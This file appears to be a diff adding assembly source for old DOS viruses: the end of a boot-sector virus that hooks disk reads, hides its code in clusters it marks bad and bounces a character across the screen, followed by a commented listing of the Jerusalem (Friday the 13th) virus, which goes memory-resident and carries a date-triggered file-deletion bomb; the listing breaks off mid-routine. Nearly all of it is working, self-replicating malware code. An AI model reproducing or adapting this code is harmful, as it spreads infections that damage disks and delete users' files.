+   PUSH  CS             ; \ SET ES EQUAL TO CS
+   POP   ES             ; /
+   TEST  SWITCH,1       ; TEST NESTED INTERRUPT SWITCH
+   JNZ   PASS_OUT         ; EXIT IF ON
+   CMP   AH,2           ; TEST FOR READ SECTOR
+   JNZ   PASS_OUT         ; EXIT IF NOT
+   CMP   LSTDRV,DL      ; COMPARE DRIVE NUMBER
+   MOV   LSTDRV,DL      ; SAVE DRIVE NUMBER
+   JNZ   INT_SWITCH         ; BRANCH IF DIFFERENT THIS TIME
+
+   ; THIS IS THE ACTIVATION CODE.  IT HAS A 'WINDOW' OF JUST LESS
+   ; THAN A SECOND, APPROXIMATELY EVERY HALF HOUR, DURING WHICH
+   ; TIME A DISK-READ WILL SWITCH IT ON.
+
+   XOR   AH,AH          ; GET SYSTEM CLOCK
+   INT   1AH            ; SYSTEM CLOCK INTERRUPT
+   TEST  DH,7FH         ; TEST LOW WORD HIGH BYTE
+   JNZ   DO_TIME
+   TEST  DL,0F0H        ; TEST LOW WORD LOW BYTE
+   JNZ   DO_TIME
+   PUSH  DX             ; SAVE SYSTEM TIME
+   CALL  INTERRUPT_08         ; INSTALL SYSTEM CLOCK ROUTINE
+   POP   DX             ; RECOVER SYSTEM TIME
+DO_TIME: 
+   MOV   CX,DX          ; COPY SYSTEM TIME
+   SUB   DX,LASTTM      ; INTERVAL SINCE LAST CALL
+   MOV   LASTTM,CX      ; SAVE SYSTEM TIME
+   SUB   DX,24H         ; SUBTRACT 2 SECONDS
+   JB    PASS_OUT         ; RETURN IF LESS THAN TWO SECONDS
+INT_SWITCH: 
+   OR SWITCH,1          ; SET ON NESTED INTERRUPT SWITCH
+   PUSH  SI
+   PUSH  DI
+   CALL  DISK_INSTALL         ; INSTALL ON DISK
+   POP   DI
+   POP   SI
+   AND   SWITCH,0FEH    ; SET OFF NESTED INTERRUPT SWITCH
+PASS_OUT: 
+   POP   DX
+   POP   CX
+   POP   BX
+   POP   AX
+   POP   ES
+   POP   DS
+   DB 0EAH        ; FAR JUMP TO ORIGINAL INT 19
+   DW 01FBH       ; ORIG19 - ORIGINAL INT 19 OFFSET
+   DW 0C800H      ; ORG19S - ORIGINAL INT 19 SEGMENT
+
+   ; DISK INSTALLATION
+
+DISK_INSTALL: 
+   MOV   AX,201H        ; READ ONE SECTOR
+   MOV   DH,0           ; HEAD NUMBER 0
+   MOV   CX,1           ; TRACK 0, SECTOR 1
+   CALL  BRING_IN         ; READ FIRST SECTOR FROM DISK
+   TEST  LSTDRV,80H     ; TEST FOR HARD DRIVE
+   JZ    FAT_CHECK         ; BRANCH IF NOT
+
+   ; HARD DISK - PARTITION TABLE
+
+   MOV   SI,81BEH       ; ADDRESS TO PARTITION TABLE
+   MOV   CX,4           ; NUMBER OF ENTRIES IN TABLE
+NEXT_PART_ENTRY: 
+   CMP   BYTE PTR [SI+4],1 ; TEST FOR DOS 12-BIT FAT
+   JZ    SNARF_UP_THE_BOOT         ; BRANCH IF YES
+   CMP   BYTE PTR [SI+4],4 ; TEST FOR DOS 16-BIT FAT
+   JZ    SNARF_UP_THE_BOOT         ; BRANCH IF YES
+   ADD   SI,10H         ; ADDRESS TO NEXT ENTRY
+   LOOP  NEXT_PART_ENTRY         ; LOOP THROUGH TABLE
+   RET
+
+   ; HARD DISK - GET BOOT RECORD
+
+SNARF_UP_THE_BOOT: 
+   MOV   DX,[SI]        ; GET HEAD NUMBER OF BOOT
+   MOV   CX,[SI+2]      ; GET TRACK AND SECTOR OF BOOT
+   MOV   AX,201H        ; READ ONE SECTOR
+   CALL  BRING_IN         ; GET BOOT SECTOR FOR PARTITION
+
+   ; BOOT SECTOR PROCESSING
+
+FAT_CHECK: 
+   MOV   SI,8002H       ; ADDRESS TO BPB SOURCE
+   MOV   DI,7C02H       ; ADDRESS TO BPB TARGET
+   MOV   CX,1CH         ; LENGTH OF BPB
+   REPZ  MOVSB          ; COPY BPB
+   CMP   LATER3,1357H   ; IS VIRUS INSTALLED ALREADY
+   JNZ   WHERE_BE_THE_FAT         ; BRANCH IF NOT
+   CMP   LATER2,0
+   JNB   HEAD_EM_OUT
+   MOV   AX,FSTCLS      ; GET SECTOR NO OF FIRST CLUSTER
+   MOV   CURCLS,AX      ; SAVE IT
+   MOV   SI,REMAI2
+   JMP   PLACE_VIRUS
+
+HEAD_EM_OUT:  RET
+
+   ; CALCULATE LOCATION OF FAT AND FIRST CLUSTER
+
+WHERE_BE_THE_FAT: 
+   CMP   BIPSEC,200H    ; SECTOR SIZE 512
+   JNZ   HEAD_EM_OUT         ; EXIT IF DIFFERENT SIZE
+   CMP   ALCSEC,2       ; SECTORS PER CLUSTER
+   JB    HEAD_EM_OUT         ; EXIT IF LESS THAN 2
+   MOV   CX,VERVED      ; GET RESERVED SECTORS
+   MOV   AL,RUMNUM      ; NUMBER OF FATS
+   CBW                  ; FILL OUT REGISTER
+   MUL   FASNUM         ; SECTORS PER FAT
+   ADD   CX,AX          ; SECTOR OF ROOT DIR
+   MOV   AX,20H         ; LENGTH OF DIR ENTRY
+   MUL   ROTRID         ; NUMBER OF DIR ENTRIES
+   ADD   AX,1FFH        ; ROUND UP TO WHOLE SECTORS
+   MOV   BX,200H        ; LENGTH OF SECTOR
+   DIV   BX             ; SECTORS OF ROOT DIR
+   ADD   CX,AX          ; SECTOR OF FIRST CLUSTER
+   MOV   CURCLS,CX      ; SAVE THIS
+   MOV   AX,SECNUM      ; GET NUMBER OF SECTORS
+   SUB   AX,CURCLS      ; SUBTRACT NON-DATA SECTORS
+   MOV   BL,NUMSEC      ; GET SECTORS PER CLUSTER
+   XOR   DX,DX
+   XOR   BH,BH          ; CLEAR TOP OF REGISTER
+   DIV   BX             ; CALCULATE NUMBER OF CLUSTERS
+   INC   AX             ; ALLOW FOR NUMBER ONE NOT USED
+   MOV   DI,AX
+   AND   SWITCH,0FBH    ; SET OFF 16-BIT FAT SWITCH
+   CMP   AX,0FF0H       ; SEE IF 12-BIT FAT
+   JBE   WRITE_FAT         ; BRANCH IF YES
+   OR    SWITCH,4       ; SET ON 16-BIT FAT SWITCH
+WRITE_FAT: 
+   MOV   SI,1           ; INITIALISE FAT ENTRY COUNT
+   MOV   BX,SECRES      ; GET RESERVED SECTORS
+   DEC   BX             ; ALLOW FOR ADDITION
+   MOV   CURFAT,BX      ; SAVE CURRENT FAT SECTOR
+   MOV   PRCFAT,0FEH    ; SET PROCESSED FAT LENGTH TO -2
+   JMP   SHORT READ_FAT
+
+   ; DATA AREA
+
+   DW 2     ; CURFAT - CURRENT FAT SECTOR
+   DW 12    ; CURCLS - SECTOR NUMBER OF FIRST CLUSTER
+   DB 1     ; SWITCH - SWITCHES
+            ;        - 01H - NESTED INTERRUPT
+            ;        - 02H - TIMER INTERRUPT INSTALLED
+            ;        - 04H - 16-BIT FAT
+   DB 0               ; LSTDRV - DRIVE LAST USED
+   DW 02B8H           ; REMAIN - SECTOR NUMBER OF REST OF CODE
+   DB 0               ; RESERV - RESERVED SPACE.. FOR FUTURE HACKING
+   DW 1357H, 0AA55H   ; FLAG01 - FLAG FIELD.
+
+      ; END OF FIRST SECTOR, START OF SECOND
+
+   ; SEARCH FAT FOR UNUSED CLUSTER
+
+READ_FAT: 
+   INC   CURFAT         ; ADDRESS TO NEXT FAT SECTOR
+   MOV   BX,CURFAT      ; GET NEXT SECTOR NUMBER
+   ADD   PRCFAT,2       ; ADD TO PROCESSED FAT LENGTH
+   CALL  READ_IT_IN         ; READ FAT SECTOR
+   JMP   SHORT GET_EM_NEXT
+
+FAT_SWITCH: 
+   MOV   AX,3        ; LENGTH OF TWO FAT ENTRIES
+   TEST  SWITCH,4    ; TEST 16-BIT FAT SWITCH
+   JZ FAT_ENTRY         ; BRANCH IF OFF
+   INC   AX          ; FOUR BYTES NOT THREE
+FAT_ENTRY: 
+   MUL   SI          ; MULTIPLY BY FAT ENTRY NUMBER
+   SHR   AX,1        ; DIVIDE BY TWO
+   SUB   AH,PRCFAT   ; SUBTRACT PROCESSED FAT LENGTH
+   MOV   BX,AX       ; COPY DISPLACEMENT
+   CMP   BX,1FFH     ; SEE IF IN THIS SECTOR
+   JNB   READ_FAT      ; BRANCH IF NOT
+   MOV   DX,[BX+8000H]     ; GET ENTRY
+   TEST  SWITCH,4    ; TEST 16-BIT FAT SWITCH
+   JNZ   F_TEST_1      ; BRANCH IF ON
+   MOV   CL,4        ; POSITIONS TO MOVE
+   TEST  SI,1        ; TEST FOR ODD-NUMBERED ENTRY
+   JZ    FAT_TOP      ; BRANCH IF NOT
+   SHR   DX,CL       ; SHIFT EVEN ENTRY INTO POSITION
+FAT_TOP: 
+   AND   DH,0FH      ; SWITCH OFF TOP BITS
+F_TEST_1: 
+   TEST  DX,0FFFFH   ; TEST ALL BITS
+   JZ    MAKE_BAD      ; BRANCH IF NONE ON
+GET_EM_NEXT: 
+   INC   SI          ; NEXT FAT ENTRY
+   CMP   SI,DI       ; HAS LAST ENTRY BEEN PROCESSED
+   JBE   FAT_SWITCH      ; BRANCH IF NOT
+   RET
+
+   ; SPARE CLUSTER FOUND - INSTALL ON DISK
+
+MAKE_BAD: 
+   MOV   DX,0FFF7H   ; LOAD BAD SECTOR MARKER
+   TEST  SWITCH,4    ; TEST 16-BIT FAT SWITCH
+   JNZ   FIND_SECTOR      ; BRANCH IF ON
+   AND   DH,0FH      ; CONVERT MARKER TO FF7H
+   MOV   CL,4        ; BITS TO MOVE
+   TEST  SI,1        ; TEST FOR ODD-NUMBERED ENTRY
+   JZ    FIND_SECTOR      ; BRANCH IF NOT
+   SHL   DX,CL       ; MOVE INTO POSITION
+FIND_SECTOR: 
+   OR [BX+8000H],DX  ; PUT MARKER INTO FAT
+   MOV   BX,CURFAT   ; GET SECTOR NUMBER
+   CALL  WRITE_IT_OUT      ; WRITE FAT SECTOR
+   MOV   AX,SI       ; GET ENTRY NUMBER
+   SUB   AX,2        ; SUBTRACT FIRST CLUSTER NUMBER
+   MOV   BL,NUMSEC   ; GET SECTORS PER CLUSTER
+   XOR   BH,BH       ; CLEAR TOP OF REGISTER
+   MUL   BX          ; CONVERT TO SECTORS
+   ADD   AX,CURCLS   ; ADD SECTOR NUMBER OF 1ST CLUSTER
+   MOV   SI,AX       ; SAVE REAL SECTOR NUMBER
+   MOV   BX,0        ; SECTOR ZERO
+   CALL  READ_IT_IN      ; READ BOOT SECTOR
+   MOV   BX,SI       ; GET OUTPUT SECTOR NUMBER
+   INC   BX          ; ADDRESS TO NEXT SECTOR
+   CALL  WRITE_IT_OUT      ; WRITE BOOT SECTOR TO STORE
+PLACE_VIRUS: 
+   MOV   BX,SI       ; GET OUTPUT SECTOR NUMBER
+   MOV   REMAIN,SI   ; SAVE SECTOR NO OF REST OF CODE
+   PUSH  CS          ; \ GET CURRENT SEGMENT
+   POP   AX          ; /
+   SUB   AX,20H      ; ADDRESS BACK TO VIRUS (2)
+   MOV   ES,AX       ; SET BUFFER ADDRESS
+   CALL  WRITE_IT_OUT      ; WRITE VIRUS (2)
+   PUSH  CS          ; \ GET CURRENT SEGMENT
+   POP   AX          ; /
+   SUB   AX,40H      ; ADDRESS BACK TO VIRUS (1)
+   MOV   ES,AX       ; SET BUFFER ADDRESS
+   MOV   BX,0        ; SECTOR ZERO
+   CALL  WRITE_IT_OUT      ; WRITE VIRUS (1)
+   RET
+
+   DW 20CH        ; LASTTM - SYSTEM TIME LAST CALLED
+   DB 2           ; PRCFAT - PROCESSED FAT / 256
+
+   ; INSTALL INTERRUPT 8 (SYSTEM CLOCK) ROUTINE IF NOT DONE
+
+INTERRUPT_08: 
+   TEST  SWITCH,2       ; TEST INT 8 INSTALLED SWITCH
+   JNZ   FINISH_TIME         ; BRANCH IF ON
+   OR    SWITCH,2       ; SET ON INT 8 INSTALLED SWITCH
+   MOV   AX,0           ; \ SEGMENT ZERO
+   MOV   DS,AX          ; /
+   MOV   AX,INT8OF      ; SAVE INT 8 OFFSET
+   MOV   BX,INT8SG      ; SAVE INT 8 SEGMENT
+   MOV   INT8OF,OFFSET DO_VIDEO+7C00H ; NEW INT 8 OFFSET
+   MOV   INT8SG,CS      ; NEW INT 8 SEGMENT
+   PUSH  CS             ; \ SET DS EQUAL TO CS
+   POP   DS             ; /
+   MOV   ORG08O,AX      ; STORE OLD INT 8 OFFSET
+   MOV   ORG08S,BX      ; STORE OLD INT 8 SEGMENT
+FINISH_TIME: 
+   RET
+
+   ; INTERRUPT 10
+
+DO_VIDEO: 
+   PUSH  DS
+   PUSH  AX
+   PUSH  BX
+   PUSH  CX
+   PUSH  DX
+   PUSH  CS             ; \ SET DS EQUAL TO CS
+   POP   DS             ; /
+   MOV   AH,0FH         ; GET VDU PARAMETERS
+   INT   10H            ; VDU INTERRUPT
+   MOV   BL,AL          ; VDU MODE
+   CMP   BX,MODEAP      ; TEST MODE AND ACTIVE PAGE
+   JZ    CHARACTER_ATTRIB         ; BRANCH IF UNCHANGED
+   MOV   MODEAP,BX      ; SAVE MODE AND ACTIVE PAGE
+   DEC   AH             ; VISIBLE COLUMNS
+   MOV   COLUMN,AH      ; SAVE VISIBLE COLUMNS - 1
+   MOV   AH,1           ; GRAPHICS MODE SWITCH ON
+   CMP   BL,7           ; TEST FOR TELETYPE MODE
+   JNZ   IS_IT_GRAPHICS         ; BRANCH IF NOT
+   DEC   AH             ; GRAPHICS MODE SWITCH OFF
+IS_IT_GRAPHICS: 
+   CMP   BL,4           ; TEST FOR GRAPHICS MODE
+   JNB   ROW_AND_COLUMN         ; BRANCH IF GRAPHICS OR TELETYPE
+   DEC   AH             ; GRAPHICS MODE SWITCH OFF
+ROW_AND_COLUMN: 
+   MOV   GRAPHM,AH      ; STORE GRAPHICS MODE SWITCH
+   MOV   ROWCOL,101H    ; SET ROW AND COLUMN POSITIONS
+   MOV   ROWCLM,101H    ; SET ROW AND COLUMN MOVEMENT
+   MOV   AH,3           ; GET CURSOR ADDRESS
+   INT   10H            ; VDU INTERRUPT
+   PUSH  DX             ; SAVE CURSOR ADDRESS
+   MOV   DX,ROWCOL      ; GET ROW AND COLUMN POSITIONS
+   JMP   SHORT VIDEO_01
+
+CHARACTER_ATTRIB: 
+   MOV   AH,3        ; GET CURSOR ADDRESS
+   INT   10H         ; VDU INTERRUPT
+   PUSH  DX
+   MOV   AH,2        ; SET CURSOR ADDRESS
+   MOV   DX,ROWCOL   ; GET ROW AND COLUMN POSITIONS
+   INT   10H         ; VDU INTERRUPT
+   MOV   AX,CHARAT   ; GET CHARACTER AND ATTRIBUTES
+   CMP   GRAPHM,1    ; TEST FOR GRAPHICS MODE
+   JNZ   WRITE_CHAR      ; BRANCH IF NOT
+   MOV   AX,8307H    ; CHARACTER AND WRITE MODE
+WRITE_CHAR: 
+   MOV   BL,AH       ; MOVE ATTRIBUTE OR WRITE MODE
+   MOV   CX,1        ; ONLY ONCE
+   MOV   AH,9        ; WRITE CHARACTER AND ATTRIBUTES
+   INT   10H         ; VDU INTERRUPT
+VIDEO_01: 
+   MOV   CX,ROWCLM      ; GET ROW AND COLUMN MOVEMENT
+   CMP   DH,0           ; IS ROW ZERO
+   JNZ   VIDEO_02         ; BRANCH IF NOT
+   XOR   CH,0FFH        ; \ REVERSE ROW MOVEMENT
+   INC   CH             ; /
+VIDEO_02: 
+   CMP   DH,18H         ; IS ROW 24
+   JNZ   VIDEO_04         ; BRANCH IF NOT
+   XOR   CH,0FFH        ; \ REVERSE ROW MOVEMENT
+   INC   CH             ; /
+VIDEO_04: 
+   CMP   DL,0           ; IS COLUMN 0
+   JNZ   VIDEO_05         ; BRANCH IF NOT
+   XOR   CL,0FFH        ; \ REVERSE COLUMN MOVEMENT
+   INC   CL             ; /
+VIDEO_05: 
+   CMP   DL,COLUMN      ; IS COLUMN LAST VISIBLE COLUMN
+   JNZ   VIDEO_07         ; BRANCH IF NOT
+   XOR   CL,0FFH        ; \ REVERSE COLUMN MOVEMENT
+   INC   CL             ; /
+VIDEO_07: 
+   CMP   CX,ROWCLM      ; COMPARE ROW AND COLUMN MOVEMENT
+   JNZ   VIDEO_09         ; BRANCH IF CHANGED
+   MOV   AX,CHARAT      ; GET CHARACTER AND ATTRIBUTES
+   AND   AL,7           ; SWITCH OFF TOP BIT OF CHARACTER
+   CMP   AL,3           ; TEST BITS 1 AND 2
+   JNZ   VIDEO_08         ; BRANCH IF OFF
+   XOR   CH,0FFH        ; \ REVERSE ROW MOVEMENT
+   INC   CH             ; /
+VIDEO_08: 
+   CMP   AL,5           ; TEST BITS 1 AND 3
+   JNZ   VIDEO_09         ; BRANCH IF OFF
+   XOR   CL,0FFH        ; \ REVERSE COLUMN MOVEMENT
+   INC   CL             ; /
+VIDEO_09: 
+   ADD   DL,CL       ; NEW COLUMN POSITION
+   ADD   DH,CH       ; NEW ROW POSITION
+   MOV   ROWCLM,CX   ; SAVE ROW AND COLUMN POSITIONS
+   MOV   ROWCOL,DX   ; SAVE ROW AND COLUMN POSITIONS
+   MOV   AH,2        ; SET CURSOR ADDRESS
+   INT   10H         ; VDU INTERRUPT
+   MOV   AH,8        ; READ CHARACTER AND ATTRIBUTES
+   INT   10H         ; VDU INTERRUPT
+   MOV   CHARAT,AX   ; SAVE CHARACTER AND ATTRIBUTES
+   MOV   BL,AH       ; MOVE ATTRIBUTES
+   CMP   GRAPHM,1    ; TEST FOR GRAPHICS MODE
+   JNZ   VIDEO_10      ; BRANCH IF NOT
+   MOV   BL,83H      ; WRITE MODE FOR GRAPHICS
+VIDEO_10: 
+   MOV   CX,1        ; ONCE ONLY
+   MOV   AX,907H     ; WRITE CHARACTER AND ATTRIBUTES
+   INT   10H         ; VDU INTERRUPT
+   POP   DX          ; RESTORE CURSOR ADDRESS
+   MOV   AH,2        ; SET CURSOR ADDRESS
+   INT   10H         ; VDU INTERRUPT
+   POP   DX
+   POP   CX
+   POP   BX
+   POP   AX
+   POP   DS
+   DB 0EAH        ; FAR JUMP TO ORIGINAL INT 8
+   DW 0907H       ; ORG08O - ORIGINAL INT 8 OFFSET
+   DW 10BDH       ; ORG08S - ORIGINAL INT 8 SEGMENT
+
+   DW 0720H       ; CHARAT - CHARACTER AND ATTRIBUTES
+   DW 1533H       ; ROWCOL - ROW AND COLUMN POSITIONS
+   DW 01FFH       ; ROWCLM - ROW AND COLUMN MOVEMENT
+   DB 0           ; GRAPHM - GRAPHICS MODE SWITCH
+   DW 3           ; MODEAP - MODE AND ACTIVE PAGE
+   DB 4FH         ; DW7FD6 - VISIBLE COLUMNS - 1
+
+
+   DB 0B7H, 0B7H, 0B7H, 0B6H, 040H, 040H, 088H, 0DEH, 0E6H
+   DB 05AH, 0ACH, 0D2H, 0E4H, 0EAH, 0E6H, 040H, 050H
+   DB 0ECH, 040H, 064H, 05CH, 060H, 052H, 040H, 040H
+   DB 040H, 040H, 064H, 062H, 05EH, 062H, 060H, 05EH
+   DB 070H, 06EH, 040H, 041H, 0B7H, 0B7H, 0B7H, 0B6H
+
+   ; END OF SECOND SECTOR, ORIGINAL BOOT SECTOR BEGINS HERE
+
+CODE  ENDS
+
+   END   START
+
+
+
+***************************************************************************
+---------------------------------------------------------------------------
+---------------------------------------------------------------------------
+***************************************************************************
+
+The "Jerusalem" virus.
+Also Called - Israeli, PLO, Friday the 13th - Version A
+
+
+    PAGE 64,132
+;-----------------------------------------------------------------------;
+; THE "JERUSALEM" VIRUS                               ;
+;-----------------------------------------------------------------------;
+                        ;
+    ORG  100H           ;
+                        ;
+;-----------------------------------------------------------------------;
+; JERUSALEM VIRUS                                ;
+;-----------------------------------------------------------------------;
+BEGIN_COM:                   ;COM FILES START HERE
+    JMP  CONTINUE       ;
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+A0103         DB      073H,055H
+
+MS_DOS        DB   'MsDos'        ;
+
+         DB   000H,001H,015H,018H
+
+TIME_BOMB     DB   0         ;WHEN == 1 THIS FILE GETS DELETED!
+
+         DB   000H
+A0010         DB   000H
+
+A0011         DW   100H      ;HOST SIZE (BEFORE INFECTION)
+
+OLD_08        DW   0FEA5H,0F000H  ;OLD INT 08H VECTOR (CLOCK TIC)
+
+OLD_21        DW   1460H,024EH    ;OLD INT 21H VECTOR
+OLD_24        DW   0556H,16A5H    ;001B
+
+A_FLAG        DW   7E48H          ;???
+
+A0021         DB   000H,000H,000H,000H,000H,000H,000H
+         DB   000H,000H,000H,000H
+
+A002C         DW   0         ;A SEGMENT
+
+         DB   000H,000H
+A0030         DB   000H
+
+A0031         DW   0178EH         ;OLD ES VALUE
+
+A0033         DW   0080H          ;
+                        ;
+EXEC_BLOCK    DW   0         ;ENV. SEG. ADDRESS  ;0035
+         DW   80H       ;COMMAND LINE ADDRESS
+         DW   178EH          ;+4
+         DW   005CH          ;FCB #1 ADDRESS
+         DW   178EH          ;+8
+         DW   006CH          ;FCB #2 ADDRESS
+         DW   0178EH         ;+12
+                        ;
+HOST_SP       DW   0710H          ;(TAKEN FROM EXE HEADER) 0043
+HOST_SS       DW   347AH          ;(AT TIME OF INFECTION)
+HOST_IP       DW   00C5H          ;
+HOST_CS       DW   347AH          ;
+;CHECKSUM NOT STORED, TO UNINFECT, YOU MUST CALC IT YOURSELF
+                        ;
+A004B         DW   0F010H              ;
+A004D         DB   82H            ;
+A004E         DB   0              ;
+
+EXE_HDR       DB   1CH DUP (?)         ;004F
+
+A006B         DB   5 DUP (?)      ;LAST 5 BYTES OF HOST
+
+HANDLE        DW   0005H               ;0070
+HOST_ATT DW   0020H               ;0072
+HOST_DATE     DW   0021H               ;0074
+HOST_TIME     DW   002DH               ;0076
+
+BLOCK_SIZE    DW   512            ;512 BYTES/BLOCK
+
+A007A         DW   0010H
+
+HOST_SIZE     DW   27C0H,0001H         ;007C
+HOST_NAME     DW   41D9H,9B28H         ;POINTER TO HOST NAME
+
+COMMAND_COM   DB   'COMMAND.COM'
+
+         DB   1
+A0090         DB   0,0,0,0,0
+
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+CONTINUE:                    ;
+    CLD                 ;
+    MOV  AH,0E0H             ;DO A ???...
+    INT  21H            ;
+                        ;
+    CMP  AH,0E0H             ;
+    JNC  L01B5               ;
+    CMP  AH,3           ;
+    JC   L01B5               ;
+                        ;
+    MOV  AH,0DDH             ;
+    MOV  DI,offset BEGIN_COM ;DI = BEGINNING OF OUR (VIRUS) CODE
+    MOV  SI,0710H       ;SI = SIZE OF OUR (VIRUS) CODE
+    ADD  SI,DI               ;SI = BEGINNING OF HOST CODE
+    MOV  CX,CS:[DI+11H]      ;CX = (SIZE OF HOST CODE?)
+    INT  21H            ;
+                        ;
+L01B5:   MOV  AX,CS               ;TWEEK CODE SEGMENT BY 100H
+    ADD  AX,10H              ;
+    MOV  SS,AX               ;SS = TWEEKed CS
+    MOV  SP,700H             ;SP = END OF OUR CODE (VIRUS)
+                        ;
+;TWEEK CS TO MAKE IT LOOK LIKE IP STARTS AT 0, NOT 100H BY DOING A RETF
+                        ;
+    PUSH AX             ;JMP FAR CS+10H:IP-100H
+    MOV  AX,offset BEGIN_EXE - offset BEGIN_COM
+    PUSH AX             ;
+    RETF                ;
+                        ;
+;---------------------------------------;
+    ORG  0C5h           ;
+;---------------------------------------;
+                        ;
+BEGIN_EXE:                   ;EXE FILES START HERE
+    CLD                 ;
+    PUSH ES             ;
+                        ;
+    MOV  CS:[A0031],ES       ;
+    MOV  CS:[EXEC_BLOCK+4],ES     ;INIT EXEC_BLOCK SEG VALUES
+    MOV  CS:[EXEC_BLOCK+8],ES     ;
+    MOV  CS:[EXEC_BLOCK+12],ES    ;
+                        ;
+    MOV  AX,ES               ;TWEEK ES SAME AS CS ABOVE
+    ADD  AX,10H              ;
+    ADD  CS:[HOST_CS],AX          ;   SAVE NEW ES VALUE
+    ADD  CS:[HOST_SS],AX          ;
+                        ;
+    MOV  AH,0E0H             ;
+    INT  21H            ;
+                        ;
+    CMP  AH,0E0H             ;
+    JNC  L0106               ;00F1     7313
+                        ;
+    CMP  AH,3           ;
+    POP  ES             ;00F6
+    MOV  SS,CS:[HOST_SS]          ;
+    MOV  SP,CS:[HOST_SP]          ;
+    JMP  far CS:[HSOT_IP]    ;
+                        ;
+L0106:   XOR  AX,AX               ;0106     33C0
+    MOV  ES,AX               ;0108     8EC0
+    MOV  AX,ES:[03FC]        ;010A     26A1FC03
+    MOV  CS:[A004B],AX       ;010E     2EA34B00
+    MOV  AL,ES:[03FE]        ;0112     26A0FE03
+    MOV  CS:[A004D],AL       ;0116     2EA24D00
+    MOV  Word ptr ES:[03FC],A5F3  ;011A     26C706FC03F3A5
+    MOV  Byte ptr ES:[03FE],CB    ;0121     26C606FE03CB
+    POP  AX             ;0127     58
+    ADD  AX,10H              ;0128     051000
+    MOV  ES,AX               ;012B     8EC0
+    PUSH CS             ;012D     0E
+    POP  DS             ;012E     1F
+    MOV  CX,710H             ;SIZE OF VIRUS CODE
+    SHR  CX,1           ;0132     D1E9
+    XOR  SI,SI               ;0134     33F6
+    MOV  DI,SI               ;0136     8BFE
+    PUSH ES             ;0138     06
+    MOV  AX,0142             ;0139     B84201
+    PUSH AX             ;013C     50
+    JMP  0000:03FC      ;013D     EAFC030000
+                        ;
+    MOV  AX,CS               ;0142     8CC8
+    MOV  SS,AX               ;0144     8ED0
+    MOV  SP,700H             ;0146     BC0007
+    XOR  AX,AX               ;0149     33C0
+    MOV  DS,AX               ;014B     8ED8
+    MOV  AX,CS:[A004B]       ;014D     2EA14B00
+    MOV  [03FC],AX      ;0151     A3FC03
+    MOV  AL,CS:[A004D]       ;0154     2EA04D00
+    MOV  [03FE],AL      ;0158     A2FE03
+    MOV  BX,SP               ;015B     8BDC
+    MOV  CL,04               ;015D     B104
+    SHR  BX,CL               ;015F     D3EB
+    ADD  BX,+10              ;0161     83C310
+    MOV  CS:[A0033],BX       ;
+                        ;
+    MOV  AH,4AH              ;
+    MOV  ES,CS:[A0031]       ;
+    INT  21H            ;MODIFY ALLOCATED MEMORY BLOCKS
+                        ;
+    MOV  AX,3521             ;
+    INT  21H            ;GET VECTOR
+    MOV  CS:[OLD_21],BX      ;
+    MOV  CS:[OLD_21+2],ES    ;
+                        ;
+    PUSH CS             ;0181     0E
+    POP  DS             ;0182     1F
+    MOV  DX,offset NEW_INT_21     ;0183     BA5B02
+    MOV  AX,2521             ;
+    INT  21H            ;SAVE VECTOR
+                        ;
+    MOV  ES,[A0031]          ;018B     8E063100
+    MOV  ES,ES:[A002C]       ;018F     268E062C00
+    XOR  DI,DI               ;0194     33FF
+    MOV  CX,7FFFH       ;0196     B9FF7F
+    XOR  AL,AL               ;0199     32C0
+    REPNE     SCASB               ;019C     AE
+    CMP  ES:[DI],AL          ;019D     263805
+    LOOPNZ    019B           ;01A0     E0F9
+    MOV  DX,DI               ;01A2     8BD7
+    ADD  DX,+03              ;01A4     83C203
+    MOV  AX,4B00H       ;LOAD AND EXECUTE A PROGRAM
+    PUSH ES             ;
+    POP  DS             ;
+    PUSH CS             ;
+    POP  ES             ;
+    MOV  BX,35H              ;
+                        ;
+    PUSH DS        ;01B1     ;
+    PUSH ES             ;
+    PUSH AX             ;
+    PUSH BX             ;
+    PUSH CX             ;
+    PUSH DX             ;
+                        ;
+    MOV  AH,2AH              ;
+    INT  21H            ;GET DATE
+                        ;
+    MOV  Byte ptr CS:[TIME_BOMB],0 ;SET "DONT DIE"
+                        ;
+    CMP  CX,1987             ;IF 1987...
+    JE   L01F7               ;...JUMP
+    CMP  AL,5           ;IF NOT FRIDAY...
+    JNE  L01D8               ;...JUMP
+    CMP  DL,0DH              ;IF DATE IS NOT THE 13th...
+    JNE  L01D8               ;...JUMP
+    INC  Byte ptr CS:[TIME_BOMB]  ;TIC THE BOMB COUNT
+    JMP  L01F7               ;
+                        ;
+L01D8:   MOV  AX,3508H       ;GET CLOCK TIMER VECTOR
+    INT  21H            ;GET VECTOR
+    MOV  CS:[OLD_08],BX      ;
+    MOV  CS:[OLD_08],ES      ;
+                        ;
+    PUSH CS             ;DS=CS
+    POP  DS             ;
+                        ;
+    MOV  Word ptr [A_FLAG],7E90H  ;
+                        ;
+    MOV  AX,2508H       ;SET NEW CLOCK TIC HANDLER
+    MOV  DX,offset NEW_08    ;
+    INT  21H            ;SET VECTOR
+                        ;
+L01F7:   POP  DX             ;
+    POP  CX             ;
+    POP  BX             ;
+    POP  AX             ;
+    POP  ES             ;
+    POP  DS             ;
+    PUSHF                    ;
+    CALL far CS:[OLD_21]     ;
+    PUSH DS             ;
+    POP  ES             ;
+                        ;
+    MOV  AH,49H              ;
+    INT  21H            ;FREE ALLOCATED MEMORY
+                        ;
+    MOV  AH,4DH              ;
+    INT  21H            ;GET RETURN CODE OF A SUBPROCESS
+                        ;
+;---------------------------------------;
+; THIS IS WHERE WE REMAIN RESIDENT     ;
+;---------------------------------------;
+    MOV  AH,31H              ;
+    MOV  DX,0600H  ;020F     ;
+    MOV  CL,04               ;
+    SHR  DX,CL               ;
+    ADD  DX,10H              ;
+    INT  21H            ;TERMINATE AND REMAIN RESIDENT
+                        ;
+;---------------------------------------;
+NEW_24:  XOR  AL,AL          ;021B     ;CRITICAL ERROR HANDLER
+    IRET                ;
+                        ;
+;-----------------------------------------------------------------------;
+; NEW INTERRUPT 08 (CLOCK TIC) HANDLER                     ;
+;-----------------------------------------------------------------------;
+NEW_08:  CMP  Word ptr CS:[A_FLAG],2   ;021E
+    JNE  N08_10              ;IF ... JUMP
+                        ;
+    PUSH AX             ;
+    PUSH BX             ;
+    PUSH CX             ;
+    PUSH DX             ;
+    PUSH BP             ;
+    MOV  AX,0602H       ;SCROLL UP TWO LINES
+    MOV  BH,87H              ;INVERSE VIDEO ATTRIBUTE
